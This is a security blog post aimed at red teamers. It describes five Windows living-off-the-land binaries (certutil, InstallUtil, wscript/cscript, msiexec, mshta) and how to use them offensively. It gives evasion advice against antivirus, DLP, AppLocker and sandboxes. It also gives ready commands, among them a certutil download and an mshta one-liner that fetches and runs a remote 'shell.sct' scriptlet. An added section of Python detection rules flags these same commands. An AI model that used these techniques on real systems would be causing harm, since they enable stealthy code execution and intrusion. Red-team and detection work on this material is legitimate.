InfoSecStuff.com

Top 5 LOLBins Every Red Teamer Should Know

Posted on November 13, 2025

Living-off-the-land binaries (LOLbins) are native Windows executables that perform legitimate administrative functions. Because they are signed, widely deployed, and trusted by enterprise tooling, they are used by Red Teams and Threat Actors to achieve execution, staging, and persistence while blending in with the overall network noise.

This article examines five such binaries that remain operationally useful on modern Windows estates: their intended functions, operational utility for red teamers, and important behavioral constraints to account for when selecting them as part of an engagement.

1. certutil.exe

What: Windows certificate utility (encode/decode certs, import/export, can write files).

Capabilities: Download files and Base64-encode or decode them.

Operational notes (offensive context only):

Commonly leveraged to transfer or stage Base64-encoded payloads and other binary data. Encoding allows operators to conceal file content from data loss prevention (DLP) or antivirus engines during transit and staging. A typical approach involves downloading encoded shellcode and maintaining it in that form until it reaches a location or context where security controls, such as antivirus or AppLocker, are less effective. If DLP mechanisms still flag the encoded file, applying multiple layers of encoding can sometimes evade single-pass decoding filters.

Commands:

certutil.exe -urlcache -f https://www.example.org/file.exe file.exe
certutil -encode file.exe file.base64
certutil -decode file.base64 file.exe

2. InstallUtil.exe

What: .NET installer utility used to install/uninstall assemblies.

Capabilities: Execute a specially crafted C# (.NET) assembly.

Operational notes (offensive context only):

Useful on hosts with execution restrictions because it leverages a trusted, signed system utility rather than introducing an unfamiliar executable. Assemblies executed through InstallUtil often behave differently under security controls, and the installer/uninstaller model can reduce the amount of observable activity during initial inspection. Since installer classes are only invoked when InstallUtil triggers them, the underlying assembly may appear inert when inspected or detonated in basic automated sandboxes. This discrepancy can limit how much behavioral data security products collect prior to execution through the LOLBin, which is why this technique is so powerful.

Command:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U malicious.exe

3. wscript.exe / cscript.exe

What: Windows Script Host runs VBScript and JScript files.

Capabilities: Execute script logic natively on Windows, with access to COM automation and other legacy automation interfaces.

Operational notes (offensive context only):

Script hosts remain relevant because they can execute JScript or VBScript directly through a trusted Windows component. This allows operators to run custom logic in a way that resembles normal system scripting activity, reducing the need to introduce unusual binaries. JScript-based loaders or bootstrap logic executed through wscript.exe or cscript.exe typically blend into environments where legacy scripting is still present, making them useful in estates that rely on older automation frameworks. The script itself is a plain text file, which raises less suspicion than an executable.

Command:

Wscript.exe Shell.js

4. msiexec.exe

What: Windows Installer engine responsible for installing, configuring, and removing MSI packages.

Capabilities: Execute installation routines and custom actions defined within MSI packages or transforms.

Operational notes (offensive context only):

Valuable in scenarios where activity must resemble legitimate software installation workflows. MSI packages provide a structured container for embedding logic, and executions through msiexec inherit the credibility associated with normal deployment operations. This alignment with administrative behaviour can make it suitable for staged execution in environments where conventional executable launches would stand out. Its operational utility is strongest where software deployment is frequent and loosely governed.

Command:

msiexec /quiet /i shell.msi

5. mshta.exe

What: Microsoft HTML Application Host for executing HTA files and HTML-based script content.

Capabilities: Run HTML, JavaScript, and VBScript as application logic through a native Windows host.

Operational notes (offensive context only):

Well suited for lightweight staging because it accepts script-based input and can interpret it directly without the need for compiled binaries. Its ability to execute HTML-based logic offers flexibility for bootstrapping or orchestrating follow-on components, particularly in environments where script content is less scrutinized than executables. Behaviour varies by Windows version, so its reliability is tied to understanding the specific platform characteristics of the target estate.

Command:

mshta.exe javascript:a=GetObject("script:https://www.github.com/shell.sct").Exec();close();

Download Only - Lands in INetCache:
mshta.exe https://www.github.com/shell.ext
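The same command-line traits that make these five binaries useful are what a blue team keys detections on. The following is an added example, not code from the original post: a handful of heuristics for the five LOLBins run over constructed process-creation events (image path plus command line) that mirror the article's commands. Rule names, the user-writable path list and the sample events are all assumptions chosen for illustration.

```python
"""Heuristic flags for the five LOLBins above, over constructed process events (not real telemetry)."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # {"image": full path, "cmdline": command line}
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData|Public)\\", re.I)
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)  # URL or UNC source
def _exe(ev: Event) -> str:
    return ev["image"].rsplit("\\", 1)[-1].lower()

def certutil_transfer(ev: Event) -> bool:
    # Fetching or Base64-transcoding files is outside normal certificate admin work.
    return _exe(ev) == "certutil.exe" and bool(re.search(r"\s-(urlcache|encode|decode)\b", ev["cmdline"], re.I))

def installutil_uninstall(ev: Event) -> bool:
    # /U runs the assembly's Uninstall method; rare outside packaged setup tooling.
    return _exe(ev) == "installutil.exe" and bool(re.search(r"\s/u\b", ev["cmdline"], re.I))

def script_host_user_path(ev: Event) -> bool:
    # WSH scripts launched from user-writable folders instead of managed locations.
    return _exe(ev) in {"wscript.exe", "cscript.exe"} and bool(USER_WRITABLE.search(ev["cmdline"]))

def msiexec_untrusted_source(ev: Event) -> bool:
    # Package installs sourced from a URL/UNC path or a user-writable folder.
    cl = ev["cmdline"]
    return (_exe(ev) == "msiexec.exe" and bool(re.search(r"\s/(i|package)\b", cl, re.I))
            and bool(REMOTE.search(cl) or USER_WRITABLE.search(cl)))

def mshta_inline_or_remote(ev: Event) -> bool:
    # Inline javascript:/vbscript: handlers or an HTA fetched over HTTP(S).
    return _exe(ev) == "mshta.exe" and bool(re.search(r"(javascript|vbscript):|https?://", ev["cmdline"], re.I))

RULES: List[Callable[[Event], bool]] = [certutil_transfer, installutil_uninstall,
                                        script_host_user_path, msiexec_untrusted_source, mshta_inline_or_remote]

def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every event that some rule matches."""
    return [(r.__name__, ev["cmdline"]) for ev in events for r in RULES if r(ev)]

# Constructed sample events: the article's five commands plus two benign look-alikes.
_SYS = r"C:\Windows\System32"
SAMPLE_EVENTS: List[Event] = [{"image": i, "cmdline": c} for i, c in [
    (_SYS + r"\certutil.exe", "certutil.exe -urlcache -f https://www.example.org/file.exe file.exe"),
    (_SYS + r"\certutil.exe", r"certutil -verify C:\certs\ca.cer"),  # benign
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe", "InstallUtil.exe /U malicious.exe"),
    (_SYS + r"\wscript.exe", r"Wscript.exe C:\Users\bob\Downloads\Shell.js"),
    (_SYS + r"\wscript.exe", r"wscript.exe C:\ProgramData\Logon\map_drives.vbs"),  # benign
    (_SYS + r"\msiexec.exe", r"msiexec /quiet /i C:\Users\bob\AppData\Local\Temp\shell.msi"),
    (_SYS + r"\mshta.exe", 'mshta.exe javascript:a=GetObject("script:https://www.github.com/shell.sct").Exec();close();'),
]]
```

Running `triage(SAMPLE_EVENTS)` flags the five article commands and leaves the two benign administrative invocations alone; in practice these string rules would be one layer on top of parent-process and network telemetry, since the paths and switches are trivially varied.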

Conclusion

LOLbins are not disappearing; their relevance will only increase as Windows continues to rely on signed, built-in utilities for core functionality. Operators should be familiar with multiple categories of LOLbins so they can adapt to different environments and apply the right tool for the constraints they encounter. Their widespread availability and trusted signatures make them valuable for low-visibility execution, staging, and workflow integration across a range of enterprise estates.
